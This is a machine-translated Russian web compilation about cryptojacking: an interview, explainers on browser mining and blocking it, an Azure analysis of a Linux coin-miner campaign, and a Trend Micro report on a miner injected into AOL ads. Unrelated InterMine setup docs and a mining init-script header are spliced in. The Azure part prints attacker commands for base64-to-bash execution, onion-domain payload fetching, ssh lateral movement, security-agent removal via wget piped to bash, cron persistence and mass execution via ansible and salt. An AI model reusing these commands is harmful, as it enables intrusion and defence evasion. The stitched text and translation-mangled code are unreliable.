Другое — если майнинг будет легальным способом, то как он будет контролироваться, регулироваться? Сейчас все более-менее продвинутые ИТ-специалисты ищут дешевую электроэнергию. Дешевая электроэнергия окупается, дорогая — нет. Промышленный майнинг ведется не на ваших домашних компьютерах, он давно ведется даже не на центральных процессорах, и даже уже не на видеокартах, как он долго был. Есть специальные элементы, платы, у которых нет другой цели кроме майнинга, они специально для этой цели придуманы. Это достаточно простая экономика — сумма энергии киловатт в час — это сумма того портфеля, который вы майните, на рынке. Многие системные администраторы занимаются майнингом, хорошо еще если по ночам. Это происходит везде.

Без ведома сисадмина компания может этот скрипт внедрить?

Можно на уровне (скорее всего такого уровня защита появится) вашего пользовательского компьютера запретить исполнение определенного типа скриптов. Вы можете ограничить активный контент вашей страницы. Это похоже на существование программ для блокирования рекламы. Они не дают активному контенту браузера это сделать. Наверное, можно сделать и средство, которые будет запрещать определенные скрипты.

Решить этот вопрос можно, если обратиться к партнерам и попросить их этого не делать? Например, наше СМИ не хочет, чтобы его использовали в таких целях.

Вы можете сами периодически мониторить это — приходит новый контент. Скорее всего вы как-то это мониторите, на различные киберугрозы. Но если это важно, то это может быть еще один элемент в вашем списке, который вы будете мониторить — нет ли в числе контента, который мы даем пользователю, задач на его процессор, которые непонятно к чему привязаны. Грубо говоря, вы сейчас не знаете, майнит ваш телефон или нет. Он много не намайнит в силу ограничения производительности по мощности, но тем не менее.

Криптовалюта сейчас во многих странах лежит вне правового поля.

На постсоветском пространстве почти везде статус туманный. Недавно в Раду был подан законопроект, чтобы как-то регулировать криптовалюту. Вопросы идентификации, хранения транзакций — хочется надеяться, что регулирование этому поможет.

Допустим, сегодня криптовалюта была бы легальна. Чем бы это изменило вашу ситуацию? Кто-то на вас нелегально заработал, вот он заработал легальные деньги, которые трактуются украинским государством или он заработал что-то, что не трактуется государством. Он все равно на вас заработал за счет вашего электричества, за счет замедления ваших основных задач. Если вы подаете в суд — в чем ваш убыток? Вы сами хотели зарабатывать и это на упущенную прибыль?

К нам пришло меньше посетителей, за счет этого у нас меньший оборот рекламы.

У него будет техническая экспертиза юриста, у вас она будет. Это надолго. Ключевая мысль — нужно привыкнуть к тому, что электричество можно менять на деньги. Везде, где есть много относительно дешевого управляемого электричества или вычислительных мощностей (что одно и то же), везде сидит «присосавшийся» айтишник и у него маленькая фермочка для себя.

скриптов для майнинга криптовалют — Mycryptopedia

Скрипты крипто-майнинга

Последнее обновление: 1 ноября 2018 г.

Скрипты для майнинга криптовалют — это функция, которая размещается на веб-сайте и использует центральный процессор (ЦП) посетителя веб-сайта для добычи криптовалюты. Те, кто работает со сценарием, получают вознаграждение в криптовалюте при проверке блока. Майнинг начинается, как только пользователь заходит на веб-сайт, на котором запущен скрипт крипто-майнинга, нет необходимости заражать компьютер пользователя или использовать какие-либо уязвимости, все, что требуется для майнинга, — это активировать в браузере JavaScript.Поскольку скрипты майнинга криптовалюты используют ЦП пользователя, общая производительность машины, вероятно, снизится из-за того, что она находится на веб-сайте, который использует эти скрипты.

Использование скриптов для майнинга криптовалют для веб-сайтов неуклонно растет. По данным Cyren Security Lab, основанным на выборке из 500 000 веб-сайтов, с сентября 2017 года по январь 2018 года количество доменов, в которых выполняются скрипты криптодобычи на одной или нескольких страницах, увеличилось на 725%.

Источник: Cyren Security Lab

Функция скрипта майнинга криптовалюты была впервые представлена ​​Coinhive, службой, которая позволяет владельцам веб-сайтов использовать процессор посетителей своих веб-сайтов для майнинга криптовалюты Monero.Coinhive представила скрипт для майнинга криптовалют в качестве альтернативы размещению рекламы на веб-сайте. Монетизация веб-сайта путем размещения рекламы может быть невыгодным занятием, потому что у большинства пользователей в Интернете есть блокировка рекламы. Скрипт майнинга криптовалюты дает владельцу веб-сайта альтернативный способ монетизации своего веб-сайта, используя ЦП посетителей для добычи криптовалюты или, в случае Coinhive, криптовалюты Monero. Monero часто является предпочтительной криптовалютой для запуска скриптов майнинга из-за удобного для процессора алгоритма хеширования CryptoNight, а также из-за его анонимности и безопасности.Monero использует различные технологии, которые делают практически невозможным отслеживание транзакционных данных в блокчейне Monero. Эти технологии включают:

1. Кольцевые подписи: Кольцевые подписи Monero предназначены для защиты держателей валюты Monero на входной стороне транзакции. Это делается путем слияния группы пользователей в сети Monero для создания отличительной цифровой подписи, которая позволяет авторизовать транзакцию в сети. Такая настройка затрудняет третьей стороне идентификацию точного лица, санкционировавшего транзакцию.

2. Ring Confidential Транзакции (RingCT): RingCT защищает пользователей в блокчейне Monero, скрывая стоимость переводимых средств. Это делается с помощью криптографического доказательства, которое показывает, что вход транзакции равен выходу транзакции, и все это без необходимости раскрывать фактическую стоимость самой транзакции.

3. Скрытые адреса: Эта функция Monero повышает конфиденциальность пользователей в сети.При использовании скрытых адресов отправитель должен создавать одноразовые адреса для каждой транзакции от имени получателя. В таком случае третьей стороне будет крайне сложно связать какие-либо авторизованные транзакции с фактическим адресом получателя.

Хотя Monero часто является предпочтительной криптовалютой, другие криптовалюты могут использоваться как часть скрипта майнинга криптовалют.

Практика майнинга скриптов вызвала серьезную негативную реакцию, поскольку некоторые владельцы веб-сайтов не сообщают своим посетителям, что их процессор используется для майнинга криптовалюты.Одним из примеров этого был торрент-сайт Pirate Bay, некоторые страницы которого были идентифицированы как запускающие майнер криптовалюты на основе JavaScript. Есть опасения, что если все больше веб-сайтов начнут использовать скрипты для майнинга криптовалют, открытие нескольких вкладок при просмотре Интернета приведет к быстрому снижению вычислительной мощности компьютера.

Скрипты майнинга криптовалюты обычно можно обработать, закрыв все окна браузера, которые, как вы подозреваете, содержат скрипт майнинга. Однако для всплывающих окон закрытие браузера не остановит скрипт майнинга.В этом случае вам нужно будет вызвать диспетчер задач (если это ПК с Windows) и монитор активности (если это Mac), чтобы полностью закрыть браузер и скрипт интеллектуального анализа данных. Если после закрытия браузера происходит значительное снижение использования ЦП, то вполне вероятно, что на ваш компьютер повлиял скрипт крипто-майнинга.

Приложения-блокировщики скриптов для майнинга криптовалют, похожие на adblock, в настоящее время все чаще вводятся для борьбы с практикой скриптов для майнинга криптовалют.Например, расширения веб-браузера, такие как No Coin, могут автоматически блокировать скрипты майнинга криптовалют, а также обновляются для борьбы с новыми скриптами майнинга по мере их появления.

Следует отметить, что биткойн не может быть добыт с использованием скриптов для майнинга криптовалют, потому что процесс добычи биткойнов требует слишком большой вычислительной мощности. Вместо этого для майнинга биткойнов необходимо специализированное оборудование для майнинга, известное как специализированные интегральные схемы (ASIC).

Как заблокировать скрипты майнинга в вашем веб-браузере

Эти вычисления требуют много ресурсов процессора и электроэнергии, поэтому хакеры используют скрипты майнинга браузера для незаконного использования компьютеров других людей (так называемый криптоджекинг), чтобы они могли добывать криптовалюты бесплатно.

В этой статье мы расскажем, как защитить свою систему от майнинга в браузере, чтобы киберпреступники не использовали ее в качестве средства быстрого обогащения.

Стоимость криптомайнинга

Во-первых, нам нужно понять природу криптовалют. Эти цифровые валюты основаны на криптографии (также называемой хэш-алгоритмами), которая регистрирует финансовые транзакции. Доступно только определенное количество хешей, которые помогают установить относительную ценность каждой единицы.

Создание новых единиц криптовалюты предполагает решение сложной математической задачи.Первому, кто решит проблему, платят за свои усилия в этой криптовалюте. Это означает, что легальные криптомайнеры должны инвестировать в серверные фермы для получения вычислительной мощности, огромного количества электроэнергии и систем охлаждения, которые помогают поддерживать эффективность их операций по майнингу, когда они вычисляют цифры.

Распространение богатства с помощью майнинга

Не все скрипты для майнинга в браузере являются вредоносными. Некоторые веб-сайты экспериментируют с ними как с возможным источником дохода, который заменит онлайн-рекламу.Например, одним из первых веб-сайтов, которые попробовали этот подход, был Quartz. Идея распределения усилий по майнингу криптовалюты на нескольких компьютерах пользователей в обмен на доступ к веб-сайту казалась разумной, особенно с учетом того, что пользователь будет проинформирован и предложен согласиться на сделку.

К сожалению, преступники злоупотребляли этим подходом. Вместо того, чтобы инвестировать в инфраструктуру, необходимую для законного майнинга, они рассматривают скрипты майнинга браузера как способ избежать этих затрат. И будь то Coinhive, предлагающий инструменты для майнинга Monero, которые вы вставляете на веб-сайт, или альтернативы Coinhive, такие как EObot и Awesome Miner, у которых есть браузерные биткойн-майнеры, у преступников есть необходимые инструменты под рукой.

Результат — криптоджекинг.

Как определить, был ли ваш компьютер взломан?

Учитывая чрезмерную нагрузку на ваш процессор, если ваш компьютер внезапно начинает работать медленно или ваша батарея разряжается особенно быстро, возможно, вас взломали. Как вы можете сказать?

Откройте диспетчер задач Windows или MacOS Activity Monitor и нажмите «Процессы . ». Если вы видите, что ваш браузер работает сверхурочно, вы можете закрыть его и перезапустить.К сожалению, это не говорит вам, на каком сайте запущен скрипт майнинга браузера.

К сожалению, хакерам становится труднее обнаружить их усилия. В то время как старые сценарии максимально увеличивали использование ЦП, новые сценарии криптомайнинга уменьшаются до 20 процентов, что затрудняет их обнаружение.

Остановка майнинга криптовалюты в браузерах

Хотя вручную идентифицировать атаки сейчас намного сложнее, вы можете предпринять превентивные меры, которые автоматически уменьшат вашу уязвимость и уязвимость для атак через браузер.

Развертывание расширений браузера

Самые популярные веб-браузеры теперь включают расширения, которые могут помочь остановить атаки криптомайнинга через Интернет. Они могут включать как решения, разработанные разработчиком браузера, так и расширения с открытым исходным кодом, которые можно добавить. Решения No Coin и MinerBlocker, например, отслеживают подозрительную активность и блокируют атаки, и оба имеют расширения для Chrome, Opera и Firefox.

Программное обеспечение блокировщика рекламы

Учитывая взрывной рост вредоносных программ для криптомайнинга, многие блокировщики рекламы теперь включают блокировщик Coinhive, который отфильтровывает запуск скриптов в вашем браузере.Если у вас установлен блокировщик рекламы, вам нужно выбрать его.

Отключить Javascript

Если вы хотите полностью заблокировать определенные атаки, большинство браузеров позволит вам отключить JavaScript, хотя многие законные веб-сайты по-прежнему используют JavaScript, поэтому его отключение может вызвать проблемы.

Блокировать домены

Вы также можете заблокировать определенные домены, в которых вы подозреваете криптомайнинг. Просто откройте браузер, найдите раскрывающийся список «Настроить» и заблокируйте URL-адрес.Чтобы заблокировать Coinhive, вы можете скопировать / вставить https://coin-hive.com/lib/coinhive.min.js в текстовое поле.

Заключительные мысли

Блокировка скриптов интеллектуального анализа данных в браузере — важный шаг, который необходимо предпринять для обеспечения целостности и эффективности работы вашей системы, а шаги, необходимые для защиты вашего компьютера, не очень сложны.

Имейте в виду, однако, что существует множество криптоджекеров, не использующих браузер. Вместо этого они представляют собой автономные программы, которые напрямую заражают вашу систему, часто включая программы-вымогатели, чтобы максимизировать их прибыльность.Для борьбы с этими автономными вариантами вы можете рассмотреть Acronis True Image 2020 Cyber ​​Protection, который предоставляет как проверенные возможности резервного копирования, так и интегрированный блокировщик вредоносных программ для защиты от вымогателей и криптодобычи, основанный на искусственном интеллекте.

За счет защиты от вредоносного ПО для майнинга в браузере и автономного майнинга криптовалюты вы можете помешать киберпреступникам использовать вашу систему в качестве личного банкомата.

Изучение сценариев атаки майнинга криптовалюты в Linux | Блог Azure и обновления

Атаки с использованием майнинга криптовалюты продолжают представлять угрозу для многих наших клиентов Azure Linux.В прошлом мы говорили о том, как некоторые злоумышленники используют методы грубой силы, чтобы угадать имена учетных записей и пароли и использовать их для получения доступа к машинам. Сегодня мы говорим об атаке, которую видели некоторые из наших клиентов, когда служба используется для запуска кода злоумышленников непосредственно на машине, на которой размещена служба.

Эта атака интересна по нескольким причинам. Злоумышленник повторяет эхо в своих сценариях, чтобы мы могли видеть, что они хотят делать, а не только то, что выполняется на машине.Скрипты охватывают широкий спектр возможных сервисов, которые можно использовать, поэтому они демонстрируют, насколько далеко может охватить кампания. Наконец, поскольку у нас есть сами скрипты, мы можем извлечь хорошие примеры из разделов «Боковое движение», «Уклонение от защиты», «Настойчивость» и «Цели» матрицы Linux MITER ATT & CK и использовать их, чтобы поговорить о поиске собственных данных.

Начальный вектор

Для этой атаки первым признаком того, что что-то не так в проверенных журналах, является команда echo, передающая команду, закодированную в base64, в base64 для декодирования, а затем в bash.Для наших пользователей эта первая команда имеет родительский процесс приложения или службы, доступной в Интернете, и команда запускается учетной записью пользователя, связанной с этим процессом. Это указывает на то, что само приложение или служба использовались для выполнения команд. Хотя некоторые из этих учетных записей относятся к конкретному клиенту, мы также видим, что используются общие учетные записи, такие как Ubuntu, Jenkins и Hadoop.

/ bin / sh -c "echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYm

luOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K CmRvbm

UK | base64 -d | bash "

Скрипты

Стоит вкратце поговорить о том, как злоумышленник использует скрипты.В этом случае они делают почти все с помощью скриптов в кодировке base64. Одна из интересных особенностей этих скриптов заключается в том, что они начинаются с одних и тех же первых двух строк: перенаправляют стандартный поток ошибок и стандартный выходной поток на / dev / null и устанавливают переменную пути в места, которые, как известно злоумышленнику, обычно содержат системные команды, которые они хочу бежать.

exec &> / dev / null
экспорт ПУТЬ = $ ПУТЬ: / bin: / sbin: / usr / bin: / usr / sbin: / usr / local / bin: / usr / local / sbin

Это указывает на то, что когда каждый из них закодирован в формате base64, первая часть кодирования всегда одинакова.

ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYm

luOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K

Использование одной и той же команды особенно полезно при попытке связать атаки на большом наборе машин. Сами скрипты интересны еще и тем, что мы можем видеть, что злоумышленник намеревался запустить. Защитникам может быть очень полезно при любой возможности взглянуть на сценарии злоумышленников, чтобы увидеть, как они пытаются манипулировать системами.Например, этот злоумышленник использует цикл for для циклического перебора различных возможных доменных имен. Такое понимание дает защитникам больше данных, на которые можно обратить внимание во время расследования.

для ч в onion.glass civiclink.network tor2web.io onion.sh onion.mn onion.in.net onion.to
сделать
если ! ls / proc / $ (cat /tmp/.X11-unix/01)/io; затем
x t v. $ h
еще
перерыв
fi
выполнено

Мы наблюдали, что этот злоумышленник использовал более тридцати различных закодированных скриптов для ряда клиентов, но они ограничились примерно дюжиной базовых скриптов с небольшими различиями в именах исполняемых файлов или в сайтах загрузки.В этих сценариях есть несколько интересных примеров, которые мы можем напрямую связать с MITER ATT & CK Matrix для Linux.

Боковое перемещение

Хотя это не первое, что делает злоумышленник, он использует интересную комбинацию методов обнаружения (T1018: обнаружение удаленной системы) и бокового перемещения (T1021: удаленные службы) для заражения других хостов. Они просматривают файлы .bash_history, / etc / hosts и .ssh / known_hosts в поисках IP-адресов.Затем они пытаются передать свой исходный закодированный сценарий на каждый хост, используя как учетную запись root, так и учетную запись, которую они скомпрометировали на своем текущем хосте, без пароля. Обратите внимание, что функция xssh появляется перед вызовом в исходном скрипте.

hosts = $ (grep -oE "\ b ([0-9] {1,3} \.) {3} [0-9] {1,3} \ b" ~ / .bash_history / etc / hosts ~ / .ssh / known_hosts | awk -F: {'print $ 2'} | sort | uniq; awk {'print $ 1'} $ HOME / .ssh / known_hosts | sort | uniq | grep -v = | sort | uniq)
для h в $ hosts; выполните xssh root $ h; xssh $ USER $ h & готово
------
xssh () {
ssh -oBatchMode = yes -oConnectTimeout = 5 -oPasswordAuthentication = no -oPubkeyAuthentication = yes -oStrictHostKeyChecking = no $ 1 @ $ 2 'echo ZXhlYyA KZG9uZQo = | base64 -d | bash'
}

В каждом случае после того, как начальная точка опоры будет достигнута, атакующий использует аналогичный набор техник уклонения от защиты.

Уклонение от защиты

В различных сценариях злоумышленник использует методы T1107: Удаление файлов, T1222: Изменение разрешений для файлов и каталогов и T1089: Отключение инструментов безопасности, а также очевидное к этому моменту T1064: Создание сценариев.

В одном скрипте они сначала создают файл со случайным именем:

z =. / $ (Date | md5sum | cut -f1 -d "")

После загрузки исполняемого файла в этот файл они изменяют загруженный файл для выполнения, запускают его, затем удаляют файл с диска:

chmod + x $ z; $ z; rm -f

В другом сценарии злоумышленник пытается загрузить и запустить файлы удаления для Alibaba Cloud Security Server Guard и службы AliCloud CloudMonitor (переменная $ w установлена ​​как команда wget ранее в сценарии).

$ w update.aegis.aliyun.com/download/uninstall.sh|bash
$ w update.aegis.aliyun.com/download/quartz_uninstall.sh|bash
/usr/local/qcloud/stargate/admin/uninstall.sh

Стойкость

После того, как майнер заработает, этот злоумышленник использует комбинацию задач T1168: Local Job Scheduling и T1501: Systemd Service, запланированных для сохранения. Приведенный ниже фрагмент взят из другой части сценария, где они выводят вызов ntp и один из своих сценариев в кодировке base64 в файловую систему d-ntpdate, а затем добавляют задание cron для запуска этого файла.Закодированный сценарий здесь в основном совпадает с исходным сценарием, с которого началось вторжение.

echo -e "# \ x21 / bin / bash \ nexec &> / dev / null \ nntpdate ntp.aliyun.com \ nsleep $ ((RANDOM% 600)) \ necho ZXhlYyAmPi9 2gKZmkK | base64 -d | bash "> / lib / systemd / systemd-ntpdate
.
echo "0 * * * * корень / lib / systemd / systemd-ntpdate"> /etc/cron.d/0systemd-ntpdate
сенсорный -r / bin / grep / lib / systemd / systemd-ntpdate
коснитесь -r / bin / grep / etc / cron.d / 0systemd-ntpdate
chmod + x / lib / systemd / systemd-ntpdate

Цели

Как упоминалось ранее, основная цель этого злоумышленника — запустить майнер монет. Они делают это в самом первом скрипте, который запускается с использованием тактики T1496: Resource Hijacking. Одна из интересных особенностей этой атаки заключается в том, что в то время как они начинают с попытки запустить майнер монет с изначально взломанной учетной записью, один из последующих скриптов пытается запустить ее, используя команды из разных программ (T1072: Стороннее Программного обеспечения).

ansible all -m shell -a 'echo ZXh uZQo = | base64 -d | bash'
нож ssh 'имя: *' 'echo ZXh uZQo = | base64 -d | bash'
salt '*' cmd.run 'echo ZXh ZQo = | base64 -d | bash'

Охота

Клиенты

ASC Linux должны ожидать появления предупреждений о майнинге монет или подозрительной загрузке в результате этого типа активности, но что, если вы захотите поохотиться за этим самостоятельно? Если вы используете приведенные выше примеры сценариев, есть несколько индикаторов, на которые вы могли бы обратить внимание, особенно если у вас ведется журнал из командной строки.

  • Вы видите неожиданные подключения к сайтам onion и tor?
  • Вы видите неожиданные ssh-соединения между хостами?
  • Вы видите рост активности со стороны конкретного пользователя?
  • Вы видите, что команды base64 выводятся эхом, декодируются и передаются по конвейеру в bash? Любой из них может быть подозрительным в зависимости от вашей собственной сети.
  • Проверьте свои задания cron, видите ли вы там строки в кодировке wgets или base64?
  • Проверьте службы, запущенные на ваших машинах, вы не заметили чего-нибудь неожиданного?
  • Что касается раздела «Цели» выше, видите ли вы команды для программ, которые у вас не установлены?

Azure Sentinel также может помочь в вашей охоте.Если вы уже являетесь клиентом Центра безопасности Azure, мы упростим интеграцию с Azure Sentinel.

Оборона

Помимо охоты, есть несколько способов защиты от атак такого типа. Если у вас есть службы с выходом в Интернет, убедитесь, что вы обновляете их, меняете все пароли по умолчанию и пользуетесь некоторыми другими инструментами управления учетными данными, которые предлагает Azure, например, точно в срок (JIT), без пароля. вход и Azure Key Vault.Следите за коэффициентом использования вашего компьютера Azure; неожиданное увеличение использования может указывать на майнера. Ознакомьтесь с другими идеями на странице документации Центра безопасности Azure.

Выявление атак на системы Linux

Майнеры монет представляют постоянную угрозу для машин, подключенных к Интернету. Хотя обычно легко заблокировать заведомо плохой IP-адрес или использовать антивирус на основе сигнатур, изучая тактику, методы и процедуры злоумышленника, защитники могут найти новые и более надежные способы защиты своей среды.

Хотя в этом посте мы говорим о конкретном злоумышленнике-майнере, основные методы, описанные выше, используются многими различными типами злоумышленников систем Linux. Мы видим методы бокового движения, уклонения от защиты и настойчивости, аналогичные вышеперечисленным, которые регулярно используются различными злоумышленниками, и постоянно добавляем новые методы обнаружения на основе наших исследований.

На рекламной платформе AOL

найден скрипт майнера криптовалюты

25 марта мы увидели, что количество криптовалютных веб-майнеров, обнаруженных Trend Micro Smart Protection Network, внезапно резко возросло.Наша команда отследила трафик веб-майнеров и обнаружила, что большая часть его связана с MSN [.] Com в Японии. Дальнейший анализ показал, что злоумышленники изменили сценарий на рекламной платформе AOL, отображаемой на сайте, чтобы запустить программу веб-майнера.

Мы уведомили команду AOL о наших результатах. AOL удалила внедренный майнер и решила проблему к 27 марта.

Первоначальный анализ рекламного веб-майнера криптовалюты AOL

Как упоминалось выше, мы обнаружили веб-майнер (обнаруженный Trend Micro как COINMINER_COINHIVE.E-JS), который был внедрен в рекламную платформу AOL. Скомпрометированная реклама привела к появлению большого количества веб-майнеров, которые мы обнаружили и оценили.

С 24 по 25 марта количество обнаружений уникальных веб-майнеров увеличилось на 108% — значительный скачок, свидетельствующий об эффективности взломанной рекламной платформы. Рекламное объявление размещалось на главной странице MSN [.] Com (обычно это страница браузера Microsoft по умолчанию), что, возможно, способствовало резкому увеличению числа обнаружений.Это автоматически перенаправило бы на страницу значительное количество пользователей.

Трафик веб-майнера был связан с вредоносным доменом www [.] Jqcdn [.] Download , который был создан 18 марта. Мы обнаружили, что этот инцидент можно классифицировать как часть кампании, поскольку было связано еще четыре домена. с этим конкретным скриптом майнинга с 2017 года.

Рис. 1. Обнаружение уникальных веб-майнеров резко выросло с 24 по 25 марта

Дальнейший анализ показал, что эта же кампания скомпрометировала более 500 веб-сайтов.Веб-сайты были связаны со страницей www [.] Datasecu [.] Download , которая содержала те же сценарии майнинга, которые мы нашли на рекламной платформе AOL.

Подробный обзор рекламного веб-майнера AOL

Вредоносный скрипт был внедрен на рекламную площадку AOL Advertising.aolp.jp . Если пользователь посещает MSN и отображается скомпрометированная реклама, его браузер запускает программу веб-майнера. Пользователю не нужно нажимать на рекламу для запуска майнера, и майнер остановится после закрытия веб-страницы.

После деобфускации веб-майнера (файл с именем ricewithchicken.js) мы увидели, что код JavaScript основан на Coinhive.

Рисунок 2. Код, показывающий, как был взломан файл Advertising.aolp.jp

Этот майнер использует частные пулы веб-майнинга, что обычно делается для того, чтобы не платить комиссию, установленную для публичных пулов. Частные пулы майнинга, используемые в этом экземпляре, разрешаются к одним и тем же IP-адресам: wss: // wsX [.] Www [.] Datasecu [.] Download / proxy и wss: // www [.] jqcdn [.] скачать: 8893 / прокси .

Рисунок 3. Пулы для майнинга криптовалюты, используемые майнером

Мы внимательно изучили скомпрометированные сайты, измененные в ходе этой кампании, и заметили, что большая часть вредоносного контента размещается в корзинах Amazon Web Service (AWS) S3. Имена сегментов S3 были видны в некоторых взломанных URL-адресах, что позволило нам изучить их дальше. Мы обнаружили, что корзины были полностью незащищенными и оставлены открытыми для внесения в список, копирования и изменения.

Мы подозреваем, что законный администратор AWS неправильно установил разрешения для своей корзины S3, что позволило злоумышленнику изменить размещенный контент. Незащищенные серверы Amazon S3 были проблемой с 2017 года, и в этом году они уже использовались в нескольких схемах майнинга криптовалюты. В ходе нашего анализа мы отметили, что некоторые веб-сайты исправили разрешения для сегментов, но не заметили вредоносный код, внедренный в контент.

В случае рекламной платформы AOL возможно, что сервер был незащищенным и модифицировался, как и другие.Мы обнаружили, что такой же тип сервера Amazon также размещал рекламный скрипт. Однако у нас не было доступа к самому ведру S3, что не позволяло нам проверить разрешение.

Кампания внедрила вредоносный сценарий в конец библиотеки JavaScript в незащищенных сегментах S3. Администраторы веб-сайтов могут легко проверить наличие любого сценария, в который введен код, подобный приведенному ниже, или доменов для майнинга, которые мы перечислили в разделе «Индикаторы компрометации», чтобы проверить, были ли изменены их сайты.

Рисунок 4. Внедрение вредоносного скрипта для загрузки майнера криптовалюты

Организации должны защищать и всегда правильно настраивать свои серверы для предотвращения подобных угроз. Чтобы защитить себя, они должны выбрать правильное решение для облачной безопасности, исходя из своих конкретных потребностей. Trend Micro Deep Security для облака может обеспечить упреждающее обнаружение и предотвращение угроз, в то время как Hybrid Cloud Security обеспечивает оптимальную безопасность для гибридных сред, включающих физические, виртуальные и облачные рабочие нагрузки.

Trend Micro Deep Security as a Service оптимизирован для AWS, Azure и VMware для мгновенной защиты серверов. Это снижает нагрузку на ваш перегруженный ИТ-отдел, переложив настройку безопасности, управление и обновления системы на Trend Micro. Deep Security as a Service может немедленно приступить к защите серверов без установки или настройки системы.

Мы работали с командой AOL над решением этой проблемы и ценим быстрый ответ команды.

Индикаторы взлома (IoC)

SHA256 c6c5b88e5b641484c9f50f1abdbebb10e5a48db057e35cb7f556779c5684003b

Вредоносные домены Определение
www [.] jqcdn [.] скачать Частный домен веб-майнера
www [.] Datasecu [.] Загрузить Частный домен веб-майнера
www [.] Dataservices [.] Загрузить Частный домен веб-майнера
www [.] Jquery-cdn [.] Загрузить Частный домен веб-майнера
www [.] Securedates [.] Загрузить Частный домен веб-майнера

Обновлено 12 апреля 2018 г. 10:00

График на рисунке 1.был неправильно маркирован, это было исправлено.

Создайте свой собственный InterMine! — Документация InterMine

Это руководство покажет вам, как создать новый InterMine. Вам потребуются все зависимости, перечисленные в разделе «Программное обеспечение».

Примечание

Эти инструкции предполагают, что вы изучили Учебное пособие, подробное руководство по интеграции данных с InterMine.

См. Быстрый старт, чтобы запустить наш тест InterMine — BioTestMine.

1. Запустите сценарий для создания InterMine

Скачайте скрипт.

 ~ / git / $ git clone https://github.com/intermine/intermine-scripts.git
 

Выполните сценарий для создания вашего экземпляра InterMine. Здесь мы используем TigerMine , но, конечно, вы можете использовать здесь свое имя шахты.

 ~ / git / $ ~ / git / intermine-scripts / make_mine TigerMine
 

Вы увидите сообщение типа: создан каталог / home / $ USER / git / tigermine для tigermine .

Теперь у вас есть InterMine! В учебнике подробно рассказывается о различных файлах, составляющих InterMine.

2. Добавьте файл свойств шахты

Ваш InterMine использует файл свойств для имен пользователей и паролей базы данных, давайте сейчас создадим этот файл.

Создайте промежуточный каталог в своем домашнем каталоге.

 # перейти в домашний каталог
~ / git $ cd
# создаем промежуточный каталог
~ $ mkdir .intermine
 

Скопируйте файл свойств, созданный в учебнике.

 ~ / .intermine $ wget https://github.com/intermine/biotestmine/blob/master/data/biotestmine.характеристики
 

Переименуйте файл, чтобы он соответствовал вашей шахте.

 ~ / .intermine $ mv biotestmine.properties tigermine.properties
 

Теперь обновите ваши новые файлы свойств значениями, правильными для вашего InterMine. Вы захотите обновить детали для ваших баз данных InterMine, вы создадите их на следующем шаге.

Подробнее об этом файле и значении каждого свойства см. В разделе База данных и веб-приложение.

3. Создать базы данных

Как и в демонстрации, вы создадите свои базы данных InterMine.

 # перейти в вашу директорию шахты
~ $ cd ~ / git / tigermine
# создать базу данных для ваших шахтных данных
~ / git / tigermine $ createdb тигрмин
~ / git / tigermine $ createdb items-tigermine
# создать базу данных для пользовательской информации
~ / git / tigermine $ createdb профиль пользователя-tigermine
 

Примечание

Эти имена баз данных должны совпадать с теми, которые вы добавили в файл mine.properties на предыдущем шаге.

Эти базы данных пусты. Мы заполним основную базу данных на следующих этапах, но давайте теперь поместим некоторую информацию по умолчанию в нашу пользовательскую базу данных.

 # создаем пустые таблицы для пользовательской базы данных, плюс добавляем суперпользователя
~ / git / tigermine $ ./gradlew buildUserDB
 

4. Обновить файл проекта

Данные, загружаемые в вашу шахту, контролируются файлом project.xml , расположенным в корне вашего каталога шахты. См. Подробное описание этого файла в Project XML.

InterMine имеет несколько десятков библиотек для популярных источников данных, которые вы можете использовать. См. Полный список в Библиотеке источников данных. Выберите один из источников данных и добавьте его в XML-файл своего проекта.Не забудьте также скачать данные.

Например, NCBI — ген Entrez загружает информацию о генах из NCBI. Загрузите перечисленные файлы данных, затем добавьте данную XML-запись проекта в XML-файл проекта вашей собственной шахты, например:

 
    
    

 

См. Написание собственного источника данных, если вы хотите загрузить свои собственные данные в свою шахту.

Вы также можете добавить в свою сборку «постпроцессы», это задачи, которые запускаются после сборки базы данных, например, задачи для построения индекса поиска. Вот общие из них, которые вы, возможно, захотите включить:

 <постобработка>
  
  
  
  
  

 

Подробную информацию о том, что делают постпроцессы, см. В разделе «Постобработка».

5. Настройте поисковый индекс (необязательно)

Solr выполняет поиск по ключевым словам в InterMine. См. Solr для получения подробной информации о том, как настроить Solr для вашей шахты.

Если вы пропустите этот шаг, ваша шахта будет работать нормально, но поиск по ключевым словам завершится ошибкой.

6. Создайте и разверните свое веб-приложение

Теперь запустите сборку!

 # скачать скрипт
~ / git / tigermine $ wget https://raw.githubusercontent.com/intermine/intermine-scripts/master/project_build
# сделать исполняемый файл
~ / git / tigermine $ chmod + x сборка_проекта
 

Запустите сценарий project_build из каталога mine :

 ~ / git / tigermine $./ project_build -b локальный хост / данные / tigermine-build
 

Дополнительные сведения о сценарии project_build см. В сценарии project_build.

Запуск вашей сборки (в зависимости от ваших источников) займет несколько минут. Как только это будет сделано, разверните свое веб-приложение. Убедитесь, что tomcat запущен.

 # разверните свое веб-приложение на Tomcat
~ / git / tigermine $ ./gradlew cargoDeployRemote
# если вы уже выполняли развертывание один раз, вместо этого вы захотите выполнить эту команду:
~ / git / tigermine $ ./gradlew cargoRedeployRemote
 

См. Gradle — Быстрый старт для получения дополнительной информации о Gradle.

Следующие шаги

Поздравляем! Теперь у вас есть InterMine! Посетите его по адресу localhost: 8080 / tigermine. (замените tigermine именем, которое вы выбрали для своей шахты)

Далее вам нужно будет:

скрипт майнинга биткойнов для Debian · GitHub

скрипт майнинга биткойнов для Debian · GitHub

Мгновенно делитесь кодом, заметками и фрагментами.

Скрипт майнинга биткойнов для Debian

#! / Bin / bash
### НАЧАЛО НАЧАЛЬНОЙ ИНФОРМАЦИИ
# Предоставляет: BitCoinMining
# Обязательно-Начало:
# Required-Stop:
# Default-Start:
# Default-Stop:
# X-Interactive: ложь
# Краткое описание: Запуск / остановка BitCoing Mining poclbm-mod
### КОНЕЦ НАЧАЛА ИНФОРМАЦИИ
# Это мой частный скрипт для / etc / init.d / биткойн
# Он будет выполняться каждый раз, когда мой debian запускается.
# Я не использую свой GPU так часто, как большинство пользователей Linux (за исключением Minecraft).
# Это потому, что я запускаю свой биткойн-майнер каждый день.
